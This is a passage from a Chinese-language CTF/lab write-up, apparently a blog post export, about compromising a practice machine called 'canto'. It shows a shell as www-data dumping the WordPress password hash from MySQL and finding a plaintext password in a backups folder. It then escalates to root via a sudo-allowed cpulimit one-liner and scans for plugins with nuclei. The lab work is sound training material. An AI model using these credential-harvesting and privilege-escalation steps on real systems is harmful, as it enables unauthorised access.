(remote) www-data@canto:\/var\/www\/html$ mysql -u wordpress -p\nEnter password: \nWelcome to the MySQL monitor.  Commands end with ; or \\g.\nYour MySQL connection id is 30247\nServer version: 8.0.36-0ubuntu0.23.10.1 (Ubuntu)\n\nCopyright (c) 2000, 2024, Oracle and\/or its affiliates.\n\nOracle is a registered trademark of Oracle Corporation and\/or its\naffiliates. Other names may be trademarks of their respective\nowners.\n\nType 'help;' or '\\h' for help. Type '\\c' to clear the current input statement.\n\nmysql> show databases;\n+--------------------+\n| Database           |\n+--------------------+\n| information_schema |\n| performance_schema |\n| wordpress          |\n+--------------------+\n3 rows in set (0.01 sec)\n\nmysql> use wordpress;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nmysql> show tables;\n+-----------------------+\n| Tables_in_wordpress   |\n+-----------------------+\n| wp_commentmeta        |\n| wp_comments           |\n| wp_links              |\n| wp_options            |\n| wp_postmeta           |\n| wp_posts              |\n| wp_term_relationships |\n| wp_term_taxonomy      |\n| wp_termmeta           |\n| wp_terms              |\n| wp_usermeta           |\n| wp_users              |\n+-----------------------+\n12 rows in set (0.00 sec)\n\nmysql> show columns from wp_users;\n+---------------------+-----------------+------+-----+---------------------+----------------+\n| Field               | Type            | Null | Key | Default             | Extra          |\n+---------------------+-----------------+------+-----+---------------------+----------------+\n| ID                  | bigint unsigned | NO   | PRI | NULL                | auto_increment |\n| user_login          | varchar(60)     | NO   | MUL |                     |                |\n| user_pass           | varchar(255)    | NO   |     |                     |                |\n| user_nicename       | varchar(50)     | NO   | MUL |                     |                |\n| user_email          | varchar(100)    | NO   | MUL |                     |                |\n| user_url            | varchar(100)    | NO   |     |                     |                |\n| user_registered     | datetime        | NO   |     | 0000-00-00 00:00:00 |                |\n| user_activation_key | varchar(255)    | NO   |     |                     |                |\n| user_status         | int             | NO   |     | 0                   |                |\n| display_name        | varchar(250)    | NO   |     |                     |                |\n+---------------------+-----------------+------+-----+---------------------+----------------+\n10 rows in set (0.00 sec)\n\nmysql> select user_login,user_pass from wp_users;\n+------------+------------------------------------+\n| user_login | user_pass                          |\n+------------+------------------------------------+\n| erik       | $P$BZk2jE4XrC91HKgRS83h0gICjM0bcB. |\n+------------+------------------------------------+\n1 row in set (0.01 sec)<\/code><\/pre>\n
\u5c1d\u8bd5\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e2a\u5bc6\u7801\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ hash-identifier                                                \n   #########################################################################\n   #     __  __                     __           ______    _____           #\n   #    \/\\ \\\/\\ \\                   \/\\ \\         \/\\__  _\\  \/\\  _ `\\         #\n   #    \\ \\ \\_\\ \\     __      ____ \\ \\ \\___     \\\/_\/\\ \\\/  \\ \\ \\\/\\ \\        #\n   #     \\ \\  _  \\  \/'__`\\   \/ ,__\\ \\ \\  _ `\\      \\ \\ \\   \\ \\ \\ \\ \\       #\n   #      \\ \\ \\ \\ \\\/\\ \\_\\ \\_\/\\__, `\\ \\ \\ \\ \\ \\      \\_\\ \\__ \\ \\ \\_\\ \\      #\n   #       \\ \\_\\ \\_\\ \\___ \\_\\\/\\____\/  \\ \\_\\ \\_\\     \/\\_____\\ \\ \\____\/      #\n   #        \\\/_\/\\\/_\/\\\/__\/\\\/_\/\\\/___\/    \\\/_\/\\\/_\/     \\\/_____\/  \\\/___\/  v1.2 #\n   #                                                             By Zion3R #\n   #                                                    www.Blackploit.com #\n   #                                                   Root@Blackploit.com #\n   #########################################################################\n--------------------------------------------------\n HASH: $P$BZk2jE4XrC91HKgRS83h0gICjM0bcB.\n\nPossible Hashs:\n[+] MD5(WordPress)\n--------------------------------------------------<\/code><\/pre>\n
\u6ca1\u6709\u6536\u83b7\uff0c\u7ee7\u7eed\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n
(remote) www-data@canto:\/var\/www\/html$ cd \/home\/erik\/\n(remote) www-data@canto:\/home\/erik$ ls -la\ntotal 36\ndrwxr-xr-- 5 erik www-data 4096 May 12 13:56 .\ndrwxr-xr-x 3 root root     4096 May 12 14:24 ..\nlrwxrwxrwx 1 root root        9 May 12 13:56 .bash_history -> \/dev\/null\n-rw-r--r-- 1 erik erik      220 Jan  7  2023 .bash_logout\n-rw-r--r-- 1 erik erik     3771 Jan  7  2023 .bashrc\ndrwx------ 2 erik erik     4096 May 12 12:21 .cache\ndrwxrwxr-x 3 erik erik     4096 May 12 12:03 .local\n-rw-r--r-- 1 erik erik      807 Jan  7  2023 .profile\ndrwxrwxr-x 2 erik erik     4096 May 12 17:22 notes\n-rw-r----- 1 root erik       33 May 12 12:22 user.txt\n(remote) www-data@canto:\/home\/erik$ cd notes\/\n(remote) www-data@canto:\/home\/erik\/notes$ ls -la \ntotal 16\ndrwxrwxr-x 2 erik erik     4096 May 12 17:22 .\ndrwxr-xr-- 5 erik www-data 4096 May 12 13:56 ..\n-rw-rw-r-- 1 erik erik       68 May 12 12:07 Day1.txt\n-rw-rw-r-- 1 erik erik       71 May 12 17:22 Day2.txt\n(remote) www-data@canto:\/home\/erik\/notes$ cat *\nOn the first day I have updated some plugins and the website theme.\nI almost lost the database with my user so I created a backups folder.\n(remote) www-data@canto:\/home\/erik\/notes$ find \/ -name backups 2>\/dev\/null\n\/snap\/core22\/1380\/var\/backups\n\/snap\/core22\/864\/var\/backups\n\/var\/backups\n\/var\/wordpress\/backups\n(remote) www-data@canto:\/home\/erik\/notes$ cat \/var\/wordpress\/backups\ncat: \/var\/wordpress\/backups: Is a directory\n(remote) www-data@canto:\/home\/erik\/notes$ cd \/var\/wordpress\/backups\n(remote) www-data@canto:\/var\/wordpress\/backups$ ls -la\ntotal 12\ndrwxr-xr-x 2 root root 4096 May 12 17:15 .\ndrwxr-xr-x 3 root root 4096 May 12 17:14 ..\n-rw-r--r-- 1 root root  185 May 12 17:14 12052024.txt\n(remote) www-data@canto:\/var\/wordpress\/backups$ cat *\n------------------------------------\n| Users     |      Password        |\n------------|----------------------|\n| erik      | th1sIsTheP3ssw0rd!   |\n------------------------------------<\/code><\/pre>\n
\u5636\u3002\u3002\u3002\u3002\u3002\u3002<\/p>\n
\u5207\u6362\u7528\u6237Erik\u5c1d\u8bd5\u63d0\u6743<\/h2>\n
(remote) www-data@canto:\/var\/wordpress\/backups$ su erik              \nPassword: \nerik@canto:\/var\/wordpress\/backups$ cd ~\nerik@canto:~$ cat user.txt \nd41d8cd98f00b204e9800998ecf8427e\nerik@canto:~$ sudo -l\nMatching Defaults entries for erik on canto:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser erik may run the following commands on canto:\n    (ALL : ALL) NOPASSWD: \/usr\/bin\/cpulimit<\/code><\/pre>\n
https:\/\/gtfobins.github.io\/gtfobins\/cpulimit\/#sudo<\/a><\/p>\n
\"image-20240628163718398\"<\/div><\/p>\n
\u5c1d\u8bd5\u63d0\u6743\uff1a<\/p>\n
erik@canto:~$ sudo \/usr\/bin\/cpulimit -l 100 -f \/bin\/bash\nProcess 3159 detected\nroot@canto:\/home\/erik# cd ~\nroot@canto:~# cat root.txt \n1b56eefaab2c896e57c874a635b24b49<\/code><\/pre>\n
\u989d\u5916\u6536\u83b7<\/h2>\n
\u505a\u5b8c\u4ee5\u540e\uff0c\u770b\u4e86\u4e00\u4e0b\u5176\u4ed6\u5e08\u5085\u7684\u505a\u6cd5\uff0c\u53d1\u73b0\u4e86\u4e00\u4e2a\u5de5\u5177nuclei<\/code>\uff0c\u662f\u4e00\u4e2a\u5feb\u901f\u3001\u53ef\u914d\u7f6e\u7684\u3001\u7528\u4e8e\u626b\u63cf\u7f51\u7edc\u6f0f\u6d1e\u7684\u547d\u4ee4\u884c\u5de5\u5177\uff0c\u5728\u9776\u673a\u5220\u9664\u524d\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~]\n\u2514\u2500$ go install -v github.com\/projectdiscovery\/nuclei\/v3\/cmd\/nuclei@latest\ngo: downloading github.com\/projectdiscovery\/nuclei\/v3 v3.2.9\ngo: downloading github.com\/projectdiscovery\/nuclei v1.1.7\n.........\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/go\/bin]\n\u2514\u2500$ sudo ln -s \/home\/kali\/go\/bin\/nuclei \/usr\/sbin\/nuclei\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[\/]\n\u2514\u2500$ nuclei -h                            \nNuclei is a fast, template based vulnerability scanner focusing\non extensive configurability, massive extensibility and ease of use.\n\nUsage:\n  nuclei [flags]\n\nFlags:\nTARGET:\n   -u, -target string[]          target URLs\/hosts to scan\n   -l, -list string              path to file containing a list of target URLs\/hosts to scan (one per line)\n   -eh, -exclude-hosts string[]  hosts to exclude to scan from the input list (ip, cidr, hostname)\n   -resume string                resume scan using resume.cfg (clustering will be disabled)\n   -sa, -scan-all-ips            scan all the IP's associated with dns record\n   -iv, -ip-version string[]     IP version to scan of hostname (4,6) - (default 4)\n\nTARGET-FORMAT:\n   -im, -input-mode string        mode of input file (list, burp, jsonl, yaml, openapi, swagger) (default "list")\n   -ro, -required-only            use only required fields in input format when generating requests\n   -sfv, -skip-format-validation  skip format validation (like missing vars) when parsing input file\n\nTEMPLATES:\n   -nt, -new-templates                    run only new templates added in latest nuclei-templates release\n   -ntv, -new-templates-version string[]  run new templates added in specific version\n   -as, -automatic-scan                   automatic web scan using wappalyzer technology detection to tags mapping\n   -t, -templates string[]                list of template or template directory to run (comma-separated, file)\n   -turl, -template-url string[]          template url or list containing template urls to run (comma-separated, file)\n   -w, -workflows string[]                list of workflow or workflow directory to run (comma-separated, file)\n   -wurl, -workflow-url string[]          workflow url or list containing workflow urls to run (comma-separated, file)\n   -validate                              validate the passed templates to nuclei\n   -nss, -no-strict-syntax                disable strict syntax check on templates\n   -td, -template-display                 displays the templates content\n   -tl                                    list all available templates\n   -tgl                                   list all available tags\n   -sign                                  signs the templates with the private key defined in NUCLEI_SIGNATURE_PRIVATE_KEY env variable\n   -code                                  enable loading code protocol-based templates\n   -dut, -disable-unsigned-templates      disable running unsigned templates or templates with mismatched signature\n\nFILTERING:\n   -a, -author string[]               templates to run based on authors (comma-separated, file)\n   -tags string[]                     templates to run based on tags (comma-separated, file)\n   -etags, -exclude-tags string[]     templates to exclude based on tags (comma-separated, file)\n   -itags, -include-tags string[]     tags to be executed even if they are excluded either by default or configuration\n   -id, -template-id string[]         templates to run based on template ids (comma-separated, file, allow-wildcard)\n   -eid, -exclude-id string[]         templates to exclude based on template ids (comma-separated, file)\n   -it, -include-templates string[]   path to template file or directory to be executed even if they are excluded either by default or configuration\n   -et, -exclude-templates string[]   path to template file or directory to exclude (comma-separated, file)\n   -em, -exclude-matchers string[]    template matchers to exclude in result\n   -s, -severity value[]              templates to run based on severity. Possible values: info, low, medium, high, critical, unknown\n   -es, -exclude-severity value[]     templates to exclude based on severity. Possible values: info, low, medium, high, critical, unknown\n   -pt, -type value[]                 templates to run based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript\n   -ept, -exclude-type value[]        templates to exclude based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript\n   -tc, -template-condition string[]  templates to run based on expression condition\n\nOUTPUT:\n   -o, -output string            output file to write found issues\/vulnerabilities\n   -sresp, -store-resp           store all request\/response passed through nuclei to output directory\n   -srd, -store-resp-dir string  store all request\/response passed through nuclei to custom directory (default "output")\n   -silent                       display findings only\n   -nc, -no-color                disable output content coloring (ANSI escape codes)\n   -j, -jsonl                    write output in JSONL(ines) format\n   -irr, -include-rr -omit-raw   include request\/response pairs in the JSON, JSONL, and Markdown outputs (for findings only) [DEPRECATED use -omit-raw] (default true)\n   -or, -omit-raw                omit request\/response pairs in the JSON, JSONL, and Markdown outputs (for findings only)\n   -ot, -omit-template           omit encoded template in the JSON, JSONL output\n   -nm, -no-meta                 disable printing result metadata in cli output\n   -ts, -timestamp               enables printing timestamp in cli output\n   -rdb, -report-db string       nuclei reporting database (always use this to persist report data)\n   -ms, -matcher-status          display match failure status\n   -me, -markdown-export string  directory to export results in markdown format\n   -se, -sarif-export string     file to export results in SARIF format\n   -je, -json-export string      file to export results in JSON format\n   -jle, -jsonl-export string    file to export results in JSONL(ine) format\n\nCONFIGURATIONS:\n   -config string                        path to the nuclei configuration file\n   -tp, -profile string                  template profile config file to run\n   -tpl, -profile-list                   list community template profiles\n   -fr, -follow-redirects                enable following redirects for http templates\n   -fhr, -follow-host-redirects          follow redirects on the same host\n   -mr, -max-redirects int               max number of redirects to follow for http templates (default 10)\n   -dr, -disable-redirects               disable redirects for http templates\n   -rc, -report-config string            nuclei reporting module configuration file\n   -H, -header string[]                  custom header\/cookie to include in all http request in header:value format (cli, file)\n   -V, -var value                        custom vars in key=value format\n   -r, -resolvers string                 file containing resolver list for nuclei\n   -sr, -system-resolvers                use system DNS resolving as error fallback\n   -dc, -disable-clustering              disable clustering of requests\n   -passive                              enable passive HTTP response processing mode\n   -fh2, -force-http2                    force http2 connection on requests\n   -ev, -env-vars                        enable environment variables to be used in template\n   -cc, -client-cert string              client certificate file (PEM-encoded) used for authenticating against scanned hosts\n   -ck, -client-key string               client key file (PEM-encoded) used for authenticating against scanned hosts\n   -ca, -client-ca string                client certificate authority file (PEM-encoded) used for authenticating against scanned hosts\n   -sml, -show-match-line                show match lines for file templates, works with extractors only\n   -ztls                                 use ztls library with autofallback to standard one for tls13 [Deprecated] autofallback to ztls is enabled by default\n   -sni string                           tls sni hostname to use (default: input domain name)\n   -dt, -dialer-timeout value            timeout for network requests.\n   -dka, -dialer-keep-alive value        keep-alive duration for network requests.\n   -lfa, -allow-local-file-access        allows file (payload) access anywhere on the system\n   -lna, -restrict-local-network-access  blocks connections to the local \/ private network\n   -i, -interface string                 network interface to use for network scan\n   -at, -attack-type string              type of payload combinations to perform (batteringram,pitchfork,clusterbomb)\n   -sip, -source-ip string               source ip address to use for network scan\n   -rsr, -response-size-read int         max response size to read in bytes\n   -rss, -response-size-save int         max response size to read in bytes (default 1048576)\n   -rrt, -response-read-timeout value    response read timeout in seconds (default 5s)\n   -reset                                reset removes all nuclei configuration and data files (including nuclei-templates)\n   -tlsi, -tls-impersonate               enable experimental client hello (ja3) tls randomization\n   -hae, -http-api-endpoint string       experimental http api endpoint\n\nINTERACTSH:\n   -iserver, -interactsh-server string  interactsh server url for self-hosted instance (default: oast.pro,oast.live,oast.site,oast.online,oast.fun,oast.me)\n   -itoken, -interactsh-token string    authentication token for self-hosted interactsh server\n   -interactions-cache-size int         number of requests to keep in the interactions cache (default 5000)\n   -interactions-eviction int           number of seconds to wait before evicting requests from cache (default 60)\n   -interactions-poll-duration int      number of seconds to wait before each interaction poll request (default 5)\n   -interactions-cooldown-period int    extra time for interaction polling before exiting (default 5)\n   -ni, -no-interactsh                  disable interactsh server for OAST testing, exclude OAST based templates\n\nFUZZING:\n   -ft, -fuzzing-type string     overrides fuzzing type set in template (replace, prefix, postfix, infix)\n   -fm, -fuzzing-mode string     overrides fuzzing mode set in template (multiple, single)\n   -fuzz                         enable loading fuzzing templates (Deprecated: use -dast instead)\n   -dast                         enable \/ run dast (fuzz) nuclei templates\n   -dfp, -display-fuzz-points    display fuzz points in the output for debugging\n   -fuzz-param-frequency int     frequency of uninteresting parameters for fuzzing before skipping (default 10)\n   -fa, -fuzz-aggression string  fuzzing aggression level controls payload count for fuzz (low, medium, high) (default "low")\n\nUNCOVER:\n   -uc, -uncover                  enable uncover engine\n   -uq, -uncover-query string[]   uncover search query\n   -ue, -uncover-engine string[]  uncover search engine (shodan,censys,fofa,shodan-idb,quake,hunter,zoomeye,netlas,criminalip,publicwww,hunterhow,google) (default shodan)\n   -uf, -uncover-field string     uncover fields to return (ip,port,host) (default "ip:port")\n   -ul, -uncover-limit int        uncover results to return (default 100)\n   -ur, -uncover-ratelimit int    override ratelimit of engines with unknown ratelimit (default 60 req\/min) (default 60)\n\nRATE-LIMIT:\n   -rl, -rate-limit int               maximum number of requests to send per second (default 150)\n   -rld, -rate-limit-duration value   maximum number of requests to send per second (default 1s)\n   -rlm, -rate-limit-minute int       maximum number of requests to send per minute (DEPRECATED)\n   -bs, -bulk-size int                maximum number of hosts to be analyzed in parallel per template (default 25)\n   -c, -concurrency int               maximum number of templates to be executed in parallel (default 25)\n   -hbs, -headless-bulk-size int      maximum number of headless hosts to be analyzed in parallel per template (default 10)\n   -headc, -headless-concurrency int  maximum number of headless templates to be executed in parallel (default 10)\n   -jsc, -js-concurrency int          maximum number of javascript runtimes to be executed in parallel (default 120)\n   -pc, -payload-concurrency int      max payload concurrency for each template (default 25)\n   -prc, -probe-concurrency int       http probe concurrency with httpx (default 50)\n\nOPTIMIZATIONS:\n   -timeout int                     time to wait in seconds before timeout (default 10)\n   -retries int                     number of times to retry a failed request (default 1)\n   -ldp, -leave-default-ports       leave default HTTP\/HTTPS ports (eg. host:80,host:443)\n   -mhe, -max-host-error int        max errors for a host before skipping from scan (default 30)\n   -te, -track-error string[]       adds given error to max-host-error watchlist (standard, file)\n   -nmhe, -no-mhe                   disable skipping host from scan based on errors\n   -project                         use a project folder to avoid sending same request multiple times\n   -project-path string             set a specific project path (default "\/tmp")\n   -spm, -stop-at-first-match       stop processing HTTP requests after the first match (may break template\/workflow logic)\n   -stream                          stream mode - start elaborating without sorting the input\n   -ss, -scan-strategy value        strategy to use while scanning(auto\/host-spray\/template-spray) (default auto)\n   -irt, -input-read-timeout value  timeout on input read (default 3m0s)\n   -nh, -no-httpx                   disable httpx probing for non-url input\n   -no-stdin                        disable stdin processing\n\nHEADLESS:\n   -headless                        enable templates that require headless browser support (root user on Linux will disable sandbox)\n   -page-timeout int                seconds to wait for each page in headless mode (default 20)\n   -sb, -show-browser               show the browser on the screen when running templates with headless mode\n   -ho, -headless-options string[]  start headless chrome with additional options\n   -sc, -system-chrome              use local installed Chrome browser instead of nuclei installed\n   -lha, -list-headless-action      list available headless actions\n\nDEBUG:\n   -debug                    show all requests and responses\n   -dreq, -debug-req         show all sent requests\n   -dresp, -debug-resp       show all received responses\n   -p, -proxy string[]       list of http\/socks5 proxy to use (comma separated or file input)\n   -pi, -proxy-internal      proxy all internal requests\n   -ldf, -list-dsl-function  list all supported DSL function signatures\n   -tlog, -trace-log string  file to write sent requests trace log\n   -elog, -error-log string  file to write sent requests error log\n   -version                  show nuclei version\n   -hm, -hang-monitor        enable nuclei hang monitoring\n   -v, -verbose              show verbose output\n   -profile-mem string       optional nuclei memory profile dump file\n   -vv                       display templates loaded for scan\n   -svd, -show-var-dump      show variables dump for debugging\n   -ep, -enable-pprof        enable pprof debugging server\n   -tv, -templates-version   shows the version of the installed nuclei-templates\n   -hc, -health-check        run diagnostic check up\n\nUPDATE:\n   -up, -update                      update nuclei engine to the latest released version\n   -ut, -update-templates            update nuclei-templates to latest released version\n   -ud, -update-template-dir string  custom directory to install \/ update nuclei-templates\n   -duc, -disable-update-check       disable automatic nuclei\/templates update check\n\nSTATISTICS:\n   -stats                    display statistics about the running scan\n   -sj, -stats-json          display statistics in JSONL(ines) format\n   -si, -stats-interval int  number of seconds to wait between showing a statistics update (default 5)\n   -mp, -metrics-port int    port to expose nuclei metrics on (default 9092)\n\nCLOUD:\n   -auth                      configure projectdiscovery cloud (pdcp) api key (default true)\n   -cup, -cloud-upload        upload scan results to pdcp dashboard\n   -sid, -scan-id string      upload scan results to existing scan id (optional)\n   -sname, -scan-name string  scan name to set (optional)\n\nAUTHENTICATION:\n   -sf, -secret-file string[]  path to config file containing secrets for nuclei authenticated scan\n   -ps, -prefetch-secrets      prefetch secrets from the secrets file\n\nEXAMPLES:\nRun nuclei on single host:\n        $ nuclei -target example.com\n\nRun nuclei with specific template directories:\n        $ nuclei -target example.com -t http\/cves\/ -t ssl\n\nRun nuclei against a list of hosts:\n        $ nuclei -list hosts.txt\n\nRun nuclei with a JSON output:\n        $ nuclei -target example.com -json-export output.json\n\nRun nuclei with sorted Markdown outputs (with environment variables):\n        $ MARKDOWN_EXPORT_SORT_MODE=template nuclei -target example.com -markdown-export nuclei_report\/\n\nAdditional documentation is available at: https:\/\/docs.nuclei.sh\/getting-started\/running\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[\/]\n\u2514\u2500$ nuclei -u http:\/\/192.168.0.135 -itags fuzz -t \/home\/kali\/nuclei-templates\/http\/fuzzing\/wordpress-plugins-detect.yaml\n\n                     __     _\n   ____  __  _______\/ \/__  (_)\n  \/ __ \\\/ \/ \/ \/ ___\/ \/ _ \\\/ \/\n \/ \/ \/ \/ \/_\/ \/ \/__\/ \/  __\/ \/\n\/_\/ \/_\/\\__,_\/\\___\/_\/\\___\/_\/   v3.2.9\n\n                projectdiscovery.io\n\n[INF] Current nuclei version: v3.2.9 (latest)\n[INF] Current nuclei-templates version: v9.9.0 (latest)\n[WRN] Scan results upload to cloud is disabled.\n[INF] New templates added in latest release: 164\n[INF] Templates loaded for current scan: 1\n[INF] Executing 1 signed templates from projectdiscovery\/nuclei-templates\n[INF] Targets loaded for current scan: 1\n[wordpress-plugins-detect] [http] [info] http:\/\/192.168.0.135\/wp-content\/plugins\/akismet\/readme.txt ["Akismet Anti-spam: Spam Protection","5.3.2"] [pluginSlug="akismet"]\n[wordpress-plugins-detect] [http] [info] http:\/\/192.168.0.135\/wp-content\/plugins\/canto\/readme.txt ["Canto","3.0.4"] [pluginSlug="canto"]<\/code><\/pre>\n
nice\uff01\uff01\uff01\uff01\uff01\uff08\u539f\u8c05\u6211\u5dee\u751f\u6587\u5177\u591a\uff0c\u54c8\u54c8\u54c8\uff09<\/p>\n","protected":false},"excerpt":{"rendered":"
Canto \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/canto] \u2514\u2500$ rusts […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-697","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/697","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=697"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/697\/revisions"}],"predecessor-version":[{"id":698,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/697\/revisions\/698"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=697"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=697"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=697"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}